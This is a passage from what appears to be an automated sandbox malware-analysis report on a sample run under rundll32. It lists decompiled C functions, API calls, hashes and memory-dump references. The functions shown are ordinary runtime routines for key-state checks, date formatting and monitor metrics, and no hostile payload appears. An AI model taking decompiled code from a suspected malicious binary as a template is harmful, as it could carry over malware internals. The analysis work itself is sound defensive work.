                          APIs
                          • GetKeyState.USER32(00000010), ref: 02826A9C
                          • GetKeyState.USER32(00000011), ref: 02826AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-3916222277
                          • Opcode ID: 76bc0a96edbe4801f73d6be948cf38466877462bec8563e96281665d251ab892
                          • Instruction ID: d5abf79ae49ce034d0d53b818902d3af17d0fbe174ac49918277521144eecd01
                          • Opcode Fuzzy Hash: 76bc0a96edbe4801f73d6be948cf38466877462bec8563e96281665d251ab892
                          • Instruction Fuzzy Hash: CC31F93DD04228AFEB12DFA8D8546ADB7FAFF48350F54C4A5E804E7290F7744A94CA21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DA1A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E027DA1A4(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x27da282);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E027D40E8(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E027D4180( &_v8, 0x27da2a4);
				} else {
					E027D4180( &_v8, 0x27da298);
				}
				_t32 = E027D45A8(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E027D4358(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E027D4608( *_t49, E027D43A8( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E027DA289);
				return E027D40E8( &_v8);
			}













                          0x027da1b1
                          0x027da1b4
                          0x027da1b6
                          0x027da1ba
                          0x027da1bb
                          0x027da1c0
                          0x027da1c3
                          0x027da1c8
                          0x027da1d4
                          0x027da1df
                          0x027da1ea
                          0x027da1f1
                          0x027da20a
                          0x027da1f3
                          0x027da1fb
                          0x027da1fb
                          0x027da21e
                          0x027da237
                          0x027da246
                          0x027da24c
                          0x027da267
                          0x027da267
                          0x027da24c
                          0x027da26e
                          0x027da271
                          0x027da274
                          0x027da281

                          APIs
                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027DA282), ref: 027DA22A
                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027DA282), ref: 027DA230
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DateFormatLocaleThread
                          • String ID: yyyy
                          • API String ID: 3303714858-3145165042
                          • Opcode ID: 26ef4e33cadecc07f5fc4b79f55dbf73c4bbc723e1cff046cc4e073f98531630
                          • Instruction ID: 5c67f17db122b9dfb0906ec65f5ecdbd6dc56d01af32a15ebe780bffbba022d7
                          • Opcode Fuzzy Hash: 26ef4e33cadecc07f5fc4b79f55dbf73c4bbc723e1cff046cc4e073f98531630
                          • Instruction Fuzzy Hash: D9218079604208AFDB02EBA8C855BAF77B9FF49700F6140A5F945E7350E631AE00CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282DB0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0282DB0C(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E027EB23C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E027EB1E0(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0282D0F0(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                          0x0282db15
                          0x0282db22
                          0x0282db35
                          0x0282db39
                          0x0282db89
                          0x0282db89
                          0x0282db3b
                          0x0282db3b
                          0x0282db3b
                          0x0282db45
                          0x0282db4b
                          0x00000000
                          0x0282db53
                          0x0282db58
                          0x0282db6c
                          0x0282db83
                          0x00000000
                          0x00000000
                          0x0282db83
                          0x00000000
                          0x0282db85
                          0x0282db85
                          0x00000000
                          0x0282db3b
                          0x0282db8d
                          0x0282db96

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$EqualIntersect
                          • String ID: @
                          • API String ID: 3291753422-2766056989
                          • Opcode ID: c5a999c599bd121bc99b638634bc8ddc60aa00000a8e11a062f9caf24409d17c
                          • Instruction ID: 56cecd6fe234a8efe449b8dc6e60bae488ed9019877202cb2c35d6899cff2914
                          • Opcode Fuzzy Hash: c5a999c599bd121bc99b638634bc8ddc60aa00000a8e11a062f9caf24409d17c
                          • Instruction Fuzzy Hash: 771186396042585BCB11DA6CC898BDE7FEDAF49364F044291ED08DB352D771D9498B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4E6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E027F4E6C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x28658bb != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x286589c; // 0x27f4e6c
					 *0x286589c = E027F4BD4(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x286589c(_a4, _a8, _t19);
				}
				return _t16;
			}













                          0x027f4e72
                          0x027f4e7c
                          0x027f4ea6
                          0x027f4eaf
                          0x027f4ed7
                          0x027f4ed7
                          0x027f4eb1
                          0x027f4eb1
                          0x027f4eb6
                          0x00000000
                          0x00000000
                          0x027f4eb6
                          0x027f4e7e
                          0x027f4e83
                          0x027f4e90
                          0x027f4ea2
                          0x027f4ea2
                          0x027f4ee2

                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 027F4EBA
                          • GetSystemMetrics.USER32(00000001), ref: 027F4ECC
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromPoint
                          • API String ID: 1792783759-1072306578
                          • Opcode ID: f35aa67b95562a31664af84cebe8066ec7023673d27a8d7cbf462b9abb4098cc
                          • Instruction ID: 99c0fde5b063dce6b7dde73b87fed247f88b0049422e46eb7b0cd80c9089bd87
                          • Opcode Fuzzy Hash: f35aa67b95562a31664af84cebe8066ec7023673d27a8d7cbf462b9abb4098cc
                          • Instruction Fuzzy Hash: 0301D635648208AFDF409F98D85CB6BBBA6E7403A4F845415FF189B782E3759C618B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4D44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E027F4D44(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x28658ba != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x2865898; // 0x27f4d44
					 *0x2865898 = E027F4BD4(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x2865898(_t14, _t17);
				}
				return _t19;
			}












                          0x027f4d4a
                          0x027f4d4d
                          0x027f4d57
                          0x027f4d7c
                          0x027f4d85
                          0x027f4dac
                          0x027f4dac
                          0x027f4d59
                          0x027f4d5e
                          0x027f4d6b
                          0x027f4d78
                          0x027f4d78
                          0x027f4db7

                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 027F4D95
                          • GetSystemMetrics.USER32(00000001), ref: 027F4DA1
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromRect
                          • API String ID: 1792783759-4033241945
                          • Opcode ID: 0b4a671b912acf4eb7cf8e19ee9074ea3d1ccbe254c61e4a6b3c705556452480
                          • Instruction ID: 5e1f28c319b192b84236537eab9f30d6c332285f0e38f1e2b0203ebeef071c73
                          • Opcode Fuzzy Hash: 0b4a671b912acf4eb7cf8e19ee9074ea3d1ccbe254c61e4a6b3c705556452480
                          • Instruction Fuzzy Hash: 7401D637608104ABDB509A4ED498B6BB7E9E7403A8F845451EF08CBB81C374D880CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4CBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027F4CBC(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x28658b8 == 0) {
					 *0x2865890 = E027F4BD4(0, _t8,  *0x2865890, _t17, _t18);
					return GetSystemMetrics(_t8);
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}












                          0x027f4cc0
                          0x027f4cca
                          0x027f4cde
                          0x00000000
                          0x027f4ce4
                          0x027f4cec
                          0x027f4cf4
                          0x027f4cf4
                          0x027f4cf7
                          0x027f4d0b
                          0x027f4cf9
                          0x027f4cf9
                          0x027f4d0f
                          0x027f4cfb
                          0x027f4cfb
                          0x027f4cfb
                          0x027f4cfc
                          0x027f4d13
                          0x027f4cfe
                          0x027f4cff
                          0x027f4d02
                          0x027f4d04
                          0x027f4d04
                          0x027f4d02
                          0x027f4cfc
                          0x027f4cf9
                          0x027f4d18
                          0x027f4d1b
                          0x027f4d25
                          0x027f4d1d
                          0x00000000
                          0x027f4d1e

                          APIs
                          • GetSystemMetrics.USER32(?), ref: 027F4D1E
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          • GetSystemMetrics.USER32(?), ref: 027F4CE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: GetSystemMetrics
                          • API String ID: 1792783759-96882338
                          • Opcode ID: f1a9d8008ceb48c27385cada36580d70a7540e79dc5a91ee22c1d96e8237b046
                          • Instruction ID: 377e066954632c04f232b73d28137e8434bb1a2eed07146bf77a2e67e06611f5
                          • Opcode Fuzzy Hash: f1a9d8008ceb48c27385cada36580d70a7540e79dc5a91ee22c1d96e8237b046
                          • Instruction Fuzzy Hash: 7FF0B43291C1048BE7D09A3EA8AC23335ABEB85234FE06F20FB16577C9C3388841C254
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028136C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24keyboardCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E028136C4(intOrPtr __eax) {
				signed char _v5;
				intOrPtr _v8;
				signed int _v9;
				signed int _t14;

				_v8 = __eax;
				_t14 =  *0x2813708; // 0x0
				_v9 = _t14;
				if(GetKeyState(0x10) < 0) {
					_v9 = _v9 | 0x00000001;
				}
				if(GetKeyState(0x11) < 0) {
					_v9 = _v9 | 0x00000004;
				}
				if((_v5 & 0x00000020) != 0) {
					_v9 = _v9 | 0x00000002;
				}
				return _v9;
			}







                          0x028136ca
                          0x028136cd
                          0x028136d2
                          0x028136df
                          0x028136e1
                          0x028136e1
                          0x028136ef
                          0x028136f1
                          0x028136f1
                          0x028136f9
                          0x028136fb
                          0x028136fb
                          0x02813705

                          APIs
                          • GetKeyState.USER32(00000010), ref: 028136D7
                          • GetKeyState.USER32(00000011), ref: 028136E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-3916222277
                          • Opcode ID: a2750bfef8ab95033ea5918b1463ea9975423da1fbd6e461a81748f247a7993b
                          • Instruction ID: 4fbd952154d0d4897eb3a95e496ef120668a5358d7b2323e84691ca22f8a7593
                          • Opcode Fuzzy Hash: a2750bfef8ab95033ea5918b1463ea9975423da1fbd6e461a81748f247a7993b
                          • Instruction Fuzzy Hash: 9EE0652C8483C864DF0292E8540B7DD7FFA0B063A8F5944E8CED4662C3D6F20205A217
                          Uniqueness

                          Uniqueness Score: -1.00%